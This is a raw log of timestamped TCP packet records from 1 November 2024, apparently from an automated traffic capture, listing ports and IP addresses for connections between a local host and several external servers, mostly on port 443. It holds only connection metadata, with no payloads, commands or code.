                                                                                        Nov 1, 2024 13:45:52.088901043 CET44349741184.28.90.27192.168.2.4
                                                                                        Nov 1, 2024 13:45:52.089163065 CET44349741184.28.90.27192.168.2.4
                                                                                        Nov 1, 2024 13:45:52.136672020 CET49741443192.168.2.4184.28.90.27
                                                                                        Nov 1, 2024 13:45:52.201788902 CET49741443192.168.2.4184.28.90.27
                                                                                        Nov 1, 2024 13:45:52.243345022 CET44349741184.28.90.27192.168.2.4
                                                                                        Nov 1, 2024 13:45:52.445475101 CET44349741184.28.90.27192.168.2.4
                                                                                        Nov 1, 2024 13:45:52.445559978 CET44349741184.28.90.27192.168.2.4
                                                                                        Nov 1, 2024 13:45:52.445661068 CET49741443192.168.2.4184.28.90.27
                                                                                        Nov 1, 2024 13:45:52.446075916 CET49741443192.168.2.4184.28.90.27
                                                                                        Nov 1, 2024 13:45:52.446098089 CET44349741184.28.90.27192.168.2.4
                                                                                        Nov 1, 2024 13:45:52.501149893 CET49742443192.168.2.4184.28.90.27
                                                                                        Nov 1, 2024 13:45:52.501199961 CET44349742184.28.90.27192.168.2.4
                                                                                        Nov 1, 2024 13:45:52.501293898 CET49742443192.168.2.4184.28.90.27
                                                                                        Nov 1, 2024 13:45:52.501828909 CET49742443192.168.2.4184.28.90.27
                                                                                        Nov 1, 2024 13:45:52.501842976 CET44349742184.28.90.27192.168.2.4
                                                                                        Nov 1, 2024 13:45:53.334264994 CET44349742184.28.90.27192.168.2.4
                                                                                        Nov 1, 2024 13:45:53.334337950 CET49742443192.168.2.4184.28.90.27
                                                                                        Nov 1, 2024 13:45:53.335637093 CET49742443192.168.2.4184.28.90.27
                                                                                        Nov 1, 2024 13:45:53.335648060 CET44349742184.28.90.27192.168.2.4
                                                                                        Nov 1, 2024 13:45:53.335928917 CET44349742184.28.90.27192.168.2.4
                                                                                        Nov 1, 2024 13:45:53.337004900 CET49742443192.168.2.4184.28.90.27
                                                                                        Nov 1, 2024 13:45:53.383342028 CET44349742184.28.90.27192.168.2.4
                                                                                        Nov 1, 2024 13:45:53.579576015 CET44349742184.28.90.27192.168.2.4
                                                                                        Nov 1, 2024 13:45:53.579649925 CET44349742184.28.90.27192.168.2.4
                                                                                        Nov 1, 2024 13:45:53.579762936 CET49742443192.168.2.4184.28.90.27
                                                                                        Nov 1, 2024 13:45:53.580496073 CET49742443192.168.2.4184.28.90.27
                                                                                        Nov 1, 2024 13:45:53.580521107 CET44349742184.28.90.27192.168.2.4
                                                                                        Nov 1, 2024 13:45:53.580534935 CET49742443192.168.2.4184.28.90.27
                                                                                        Nov 1, 2024 13:45:53.580543041 CET44349742184.28.90.27192.168.2.4
                                                                                        Nov 1, 2024 13:46:01.397169113 CET44349740142.250.185.196192.168.2.4
                                                                                        Nov 1, 2024 13:46:01.397264004 CET44349740142.250.185.196192.168.2.4
                                                                                        Nov 1, 2024 13:46:01.397525072 CET49740443192.168.2.4142.250.185.196
                                                                                        Nov 1, 2024 13:46:02.088135004 CET49740443192.168.2.4142.250.185.196
                                                                                        Nov 1, 2024 13:46:02.088187933 CET44349740142.250.185.196192.168.2.4
                                                                                        Nov 1, 2024 13:46:02.507805109 CET804973982.197.65.139192.168.2.4
                                                                                        Nov 1, 2024 13:46:02.553385973 CET4973980192.168.2.482.197.65.139
                                                                                        Nov 1, 2024 13:46:03.011852980 CET49747443192.168.2.4188.114.97.3
                                                                                        Nov 1, 2024 13:46:03.011888027 CET44349747188.114.97.3192.168.2.4
                                                                                        Nov 1, 2024 13:46:03.012032032 CET49747443192.168.2.4188.114.97.3
                                                                                        Nov 1, 2024 13:46:03.012170076 CET4973980192.168.2.482.197.65.139
                                                                                        Nov 1, 2024 13:46:03.012577057 CET49747443192.168.2.4188.114.97.3
                                                                                        Nov 1, 2024 13:46:03.012588978 CET44349747188.114.97.3192.168.2.4
                                                                                        Nov 1, 2024 13:46:03.017035007 CET804973982.197.65.139192.168.2.4
                                                                                        Nov 1, 2024 13:46:03.061697960 CET49748443192.168.2.4188.114.97.3
                                                                                        Nov 1, 2024 13:46:03.061750889 CET44349748188.114.97.3192.168.2.4
                                                                                        Nov 1, 2024 13:46:03.061811924 CET49748443192.168.2.4188.114.97.3
                                                                                        Nov 1, 2024 13:46:03.065943956 CET49748443192.168.2.4188.114.97.3
                                                                                        Nov 1, 2024 13:46:03.065977097 CET44349748188.114.97.3192.168.2.4
                                                                                        Nov 1, 2024 13:46:03.179193974 CET804973982.197.65.139192.168.2.4
                                                                                        Nov 1, 2024 13:46:03.224077940 CET4973980192.168.2.482.197.65.139
                                                                                        Nov 1, 2024 13:46:03.621573925 CET44349747188.114.97.3192.168.2.4
                                                                                        Nov 1, 2024 13:46:03.622030973 CET49747443192.168.2.4188.114.97.3
                                                                                        Nov 1, 2024 13:46:03.622059107 CET44349747188.114.97.3192.168.2.4
                                                                                        Nov 1, 2024 13:46:03.623440981 CET44349747188.114.97.3192.168.2.4
                                                                                        Nov 1, 2024 13:46:03.623533010 CET49747443192.168.2.4188.114.97.3
                                                                                        Nov 1, 2024 13:46:03.632875919 CET49747443192.168.2.4188.114.97.3
                                                                                        Nov 1, 2024 13:46:03.632962942 CET44349747188.114.97.3192.168.2.4
                                                                                        Nov 1, 2024 13:46:03.633064985 CET49747443192.168.2.4188.114.97.3
                                                                                        Nov 1, 2024 13:46:03.633071899 CET44349747188.114.97.3192.168.2.4
                                                                                        Nov 1, 2024 13:46:03.633137941 CET49747443192.168.2.4188.114.97.3
                                                                                        Nov 1, 2024 13:46:03.633152008 CET49747443192.168.2.4188.114.97.3
                                                                                        Nov 1, 2024 13:46:03.633469105 CET49749443192.168.2.4188.114.97.3
                                                                                        Nov 1, 2024 13:46:03.633510113 CET44349749188.114.97.3192.168.2.4
                                                                                        Nov 1, 2024 13:46:03.633570910 CET49749443192.168.2.4188.114.97.3
                                                                                        Nov 1, 2024 13:46:03.633743048 CET49749443192.168.2.4188.114.97.3
                                                                                        Nov 1, 2024 13:46:03.633753061 CET44349749188.114.97.3192.168.2.4
                                                                                        Nov 1, 2024 13:46:03.704623938 CET44349748188.114.97.3192.168.2.4
                                                                                        Nov 1, 2024 13:46:03.712599039 CET49748443192.168.2.4188.114.97.3
                                                                                        Nov 1, 2024 13:46:03.712629080 CET44349748188.114.97.3192.168.2.4
                                                                                        Nov 1, 2024 13:46:03.714140892 CET44349748188.114.97.3192.168.2.4
                                                                                        Nov 1, 2024 13:46:03.714231968 CET49748443192.168.2.4188.114.97.3
                                                                                        Nov 1, 2024 13:46:03.720177889 CET49748443192.168.2.4188.114.97.3
                                                                                        Nov 1, 2024 13:46:03.720207930 CET49748443192.168.2.4188.114.97.3
                                                                                        Nov 1, 2024 13:46:03.720282078 CET49748443192.168.2.4188.114.97.3
                                                                                        Nov 1, 2024 13:46:03.720364094 CET44349748188.114.97.3192.168.2.4
                                                                                        Nov 1, 2024 13:46:03.720417976 CET49748443192.168.2.4188.114.97.3
                                                                                        Nov 1, 2024 13:46:03.727596998 CET49751443192.168.2.4188.114.97.3
                                                                                        Nov 1, 2024 13:46:03.727694988 CET44349751188.114.97.3192.168.2.4
                                                                                        Nov 1, 2024 13:46:03.727826118 CET49751443192.168.2.4188.114.97.3
                                                                                        Nov 1, 2024 13:46:03.728151083 CET49751443192.168.2.4188.114.97.3
                                                                                        Nov 1, 2024 13:46:03.728173018 CET44349751188.114.97.3192.168.2.4
                                                                                        Nov 1, 2024 13:46:05.048279047 CET44349749188.114.97.3192.168.2.4
                                                                                        Nov 1, 2024 13:46:05.048755884 CET44349751188.114.97.3192.168.2.4
                                                                                        Nov 1, 2024 13:46:05.048870087 CET49749443192.168.2.4188.114.97.3
                                                                                        Nov 1, 2024 13:46:05.048897982 CET44349749188.114.97.3192.168.2.4
                                                                                        Nov 1, 2024 13:46:05.049304008 CET49751443192.168.2.4188.114.97.3
                                                                                        Nov 1, 2024 13:46:05.049314976 CET44349751188.114.97.3192.168.2.4
                                                                                        Nov 1, 2024 13:46:05.049887896 CET44349749188.114.97.3192.168.2.4
                                                                                        Nov 1, 2024 13:46:05.049946070 CET49749443192.168.2.4188.114.97.3
                                                                                        Nov 1, 2024 13:46:05.050290108 CET44349751188.114.97.3192.168.2.4
                                                                                        Nov 1, 2024 13:46:05.050354004 CET49751443192.168.2.4188.114.97.3
                                                                                        Nov 1, 2024 13:46:05.051220894 CET49749443192.168.2.4188.114.97.3
                                                                                        Nov 1, 2024 13:46:05.051424026 CET44349749188.114.97.3192.168.2.4
                                                                                        Nov 1, 2024 13:46:05.051525116 CET49749443192.168.2.4188.114.97.3
                                                                                        Nov 1, 2024 13:46:05.051532030 CET44349749188.114.97.3192.168.2.4
                                                                                        Nov 1, 2024 13:46:05.051687956 CET49751443192.168.2.4188.114.97.3
                                                                                        Nov 1, 2024 13:46:05.051753044 CET44349751188.114.97.3192.168.2.4
                                                                                        Nov 1, 2024 13:46:05.094954967 CET49749443192.168.2.4188.114.97.3
                                                                                        Nov 1, 2024 13:46:05.095671892 CET49751443192.168.2.4188.114.97.3
                                                                                        Nov 1, 2024 13:46:05.095684052 CET44349751188.114.97.3192.168.2.4
                                                                                        Nov 1, 2024 13:46:05.143342018 CET49751443192.168.2.4188.114.97.3
                                                                                        Nov 1, 2024 13:46:05.417885065 CET44349749188.114.97.3192.168.2.4
                                                                                        Nov 1, 2024 13:46:05.417946100 CET44349749188.114.97.3192.168.2.4
                                                                                        Nov 1, 2024 13:46:05.418000937 CET49749443192.168.2.4188.114.97.3
                                                                                        Nov 1, 2024 13:46:05.418031931 CET44349749188.114.97.3192.168.2.4
                                                                                        Nov 1, 2024 13:46:05.420053005 CET49749443192.168.2.4188.114.97.3
                                                                                        Nov 1, 2024 13:46:05.420082092 CET44349749188.114.97.3192.168.2.4
                                                                                        Nov 1, 2024 13:46:05.420155048 CET44349749188.114.97.3192.168.2.4
                                                                                        Nov 1, 2024 13:46:05.420182943 CET49749443192.168.2.4188.114.97.3
                                                                                        Nov 1, 2024 13:46:05.420211077 CET49749443192.168.2.4188.114.97.3
                                                                                        Nov 1, 2024 13:46:05.503880978 CET49753443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:05.503936052 CET44349753104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:05.503997087 CET49753443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:05.504209042 CET49753443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:05.504218102 CET44349753104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:06.107326031 CET44349753104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:06.117866993 CET49753443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:06.117888927 CET44349753104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:06.119689941 CET44349753104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:06.119765043 CET49753443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:06.122030973 CET49753443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:06.122190952 CET49753443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:06.122200966 CET44349753104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:06.122222900 CET44349753104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:06.173409939 CET49753443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:06.173427105 CET44349753104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:06.220542908 CET49753443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:06.253076077 CET44349753104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:06.253292084 CET44349753104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:06.253695965 CET49753443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:06.254642010 CET49753443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:06.254657984 CET44349753104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:06.260373116 CET49754443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:06.260427952 CET44349754104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:06.263902903 CET49754443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:06.263902903 CET49754443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:06.263950109 CET44349754104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:06.869436979 CET44349754104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:06.869967937 CET49754443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:06.869998932 CET44349754104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:06.870390892 CET44349754104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:06.875500917 CET49754443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:06.875500917 CET49754443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:06.875519991 CET44349754104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:06.875583887 CET44349754104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:06.924405098 CET49754443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:07.008121967 CET44349754104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:07.008162975 CET44349754104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:07.008248091 CET44349754104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:07.008271933 CET44349754104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:07.008299112 CET44349754104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:07.008297920 CET49754443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:07.008330107 CET44349754104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:07.008352041 CET49754443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:07.008387089 CET49754443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:07.008392096 CET44349754104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:07.008754969 CET44349754104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:07.008784056 CET44349754104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:07.009030104 CET49754443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:07.009040117 CET44349754104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:07.009293079 CET49754443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:07.125183105 CET44349754104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:07.125386953 CET44349754104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:07.125416040 CET44349754104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:07.125618935 CET44349754104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:07.125644922 CET44349754104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:07.125658035 CET49754443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:07.125677109 CET44349754104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:07.125744104 CET44349754104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:07.125792980 CET49754443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:07.126137018 CET49754443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:07.126152992 CET44349754104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:07.126310110 CET49754443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:07.126410961 CET44349754104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:07.126465082 CET44349754104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:07.126552105 CET49754443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:07.126565933 CET44349754104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:07.126640081 CET44349754104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:07.126802921 CET49754443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:07.126816034 CET44349754104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:07.127604008 CET44349754104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:07.127635002 CET44349754104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:07.127659082 CET44349754104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:07.127728939 CET49754443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:07.127728939 CET49754443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:07.127748966 CET44349754104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:07.128530025 CET44349754104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:07.128554106 CET44349754104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:07.128715992 CET44349754104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:07.132386923 CET49754443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:07.132404089 CET44349754104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:07.197467089 CET49754443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:07.242537975 CET44349754104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:07.242903948 CET44349754104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:07.242930889 CET44349754104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:07.242950916 CET49754443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:07.242963076 CET44349754104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:07.242975950 CET44349754104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:07.243000984 CET49754443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:07.243629932 CET44349754104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:07.243676901 CET49754443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:07.256078005 CET49754443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:07.256125927 CET44349754104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:07.637762070 CET49755443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:07.637810946 CET44349755104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:07.637876987 CET49755443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:07.638446093 CET49755443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:07.638458967 CET44349755104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:07.773700953 CET49756443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:07.773735046 CET44349756104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:07.773799896 CET49756443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:07.774110079 CET49756443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:07.774125099 CET44349756104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:08.225181103 CET804973982.197.65.139192.168.2.4
                                                                                        Nov 1, 2024 13:46:08.225270033 CET4973980192.168.2.482.197.65.139
                                                                                        Nov 1, 2024 13:46:08.245579004 CET44349755104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:08.245845079 CET49755443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:08.245863914 CET44349755104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:08.247045040 CET44349755104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:08.247107029 CET49755443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:08.247447014 CET49755443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:08.247512102 CET44349755104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:08.247581959 CET49755443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:08.247587919 CET44349755104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:08.298666000 CET49755443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:08.379354000 CET44349756104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:08.379610062 CET49756443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:08.379653931 CET44349756104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:08.380671978 CET44349756104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:08.380728960 CET49756443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:08.381176949 CET49756443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:08.381239891 CET44349756104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:08.381431103 CET49756443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:08.381445885 CET44349756104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:08.385569096 CET44349755104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:08.385653019 CET44349755104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:08.385683060 CET44349755104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:08.385700941 CET49755443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:08.385715008 CET44349755104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:08.385782957 CET49755443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:08.386009932 CET44349755104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:08.386590958 CET44349755104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:08.386652946 CET49755443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:08.386658907 CET44349755104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:08.390141010 CET44349755104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:08.390180111 CET49755443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:08.390185118 CET44349755104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:08.420017958 CET4973980192.168.2.482.197.65.139
                                                                                        Nov 1, 2024 13:46:08.420401096 CET49757443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:08.420445919 CET44349757104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:08.420770884 CET49757443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:08.421092987 CET49757443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:08.421104908 CET44349757104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:08.425013065 CET804973982.197.65.139192.168.2.4
                                                                                        Nov 1, 2024 13:46:08.433760881 CET49755443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:08.433765888 CET49756443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:08.502794981 CET44349755104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:08.502875090 CET44349755104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:08.502904892 CET44349755104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:08.502931118 CET44349755104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:08.502950907 CET49755443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:08.502954960 CET44349755104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:08.502979994 CET44349755104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:08.502993107 CET49755443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:08.503012896 CET49755443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:08.503021955 CET44349755104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:08.503112078 CET44349755104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:08.503135920 CET44349755104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:08.503148079 CET49755443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:08.503153086 CET44349755104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:08.503181934 CET44349755104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:08.503217936 CET49755443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:08.503226995 CET44349755104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:08.503263950 CET44349755104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:08.503304005 CET49755443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:08.503556967 CET49755443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:08.503571033 CET44349755104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:08.509660006 CET49758443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:08.509704113 CET44349758104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:08.509835958 CET49758443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:08.510081053 CET49758443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:08.510097027 CET44349758104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:08.519310951 CET44349756104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:08.519368887 CET44349756104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:08.519397974 CET44349756104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:08.519428968 CET44349756104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:08.519464970 CET44349756104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:08.519474030 CET49756443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:08.519484043 CET44349756104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:08.519495964 CET49756443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:08.519525051 CET49756443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:08.519526958 CET44349756104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:08.519535065 CET44349756104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:08.519571066 CET49756443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:08.519576073 CET44349756104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:08.571835041 CET49756443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:08.571849108 CET44349756104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:08.627330065 CET49756443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:08.636172056 CET44349756104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:08.636267900 CET44349756104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:08.636310101 CET49756443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:08.636316061 CET44349756104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:08.636621952 CET44349756104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:08.636662006 CET44349756104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:08.636687040 CET49756443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:08.636691093 CET44349756104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:08.636725903 CET44349756104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:08.636729002 CET49756443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:08.636737108 CET44349756104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:08.636773109 CET49756443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:08.637412071 CET44349756104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:08.637478113 CET44349756104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:08.637545109 CET44349756104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:08.637588024 CET49756443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:08.637592077 CET44349756104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:08.637631893 CET49756443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:08.638206005 CET44349756104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:08.638288975 CET44349756104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:08.638326883 CET44349756104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:08.638365030 CET44349756104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:08.638370037 CET49756443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:08.638375998 CET44349756104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:08.638402939 CET49756443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:08.639097929 CET44349756104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:08.639137030 CET49756443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:08.639142036 CET44349756104.18.95.41192.168.2.4
